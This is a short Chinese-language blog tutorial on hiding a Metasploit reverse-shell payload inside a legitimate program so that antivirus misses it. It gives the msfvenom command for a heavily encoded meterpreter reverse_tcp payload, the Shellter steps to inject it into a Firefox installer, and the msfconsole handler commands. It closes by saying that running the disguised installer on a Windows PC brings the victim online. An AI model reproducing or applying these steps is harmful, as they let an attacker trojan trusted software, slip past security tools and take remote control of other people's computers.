使用Metasploit&Shellter 捆绑免杀

  • 内容
  • 相关

Shellter

Shellter是一个动态的shellcode注入工具。它可用于将shellcode捆绑注入本机Windows应用程序(仅限于32位应用程序)。shellcode也可以通过Metasploit生成的payload免杀。

准备

使用kali linux
安装 shellter
apt install shellter

或者 官网下载

1.使用Metasploit生成 payload


1.png

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=1337 -e x86/shikata_ga_nai -i 43 -f raw -o fud.raw


2.使用Shellter选择捆绑exe文件

目录下放置一个32位的exe程序,我以Firefox-latest.exe 为例


2.png


3.把 fud.raw 注入到exe程序


3.png


4.启动Metasploit监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.3
set lport 1337
exploit

* 启动监听之后,把目录下的 Firefox-latest.exe 文件放置 windows 电脑下运行即可主机上线

杀毒引擎扫描结果
4.png

本文标签:

版权声明:若无特殊注明,本文皆为《T0ex4》原创,转载请保留文章出处。

本文链接:使用Metasploit&Shellter 捆绑免杀 - https://www.k1q.cn/post-72.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注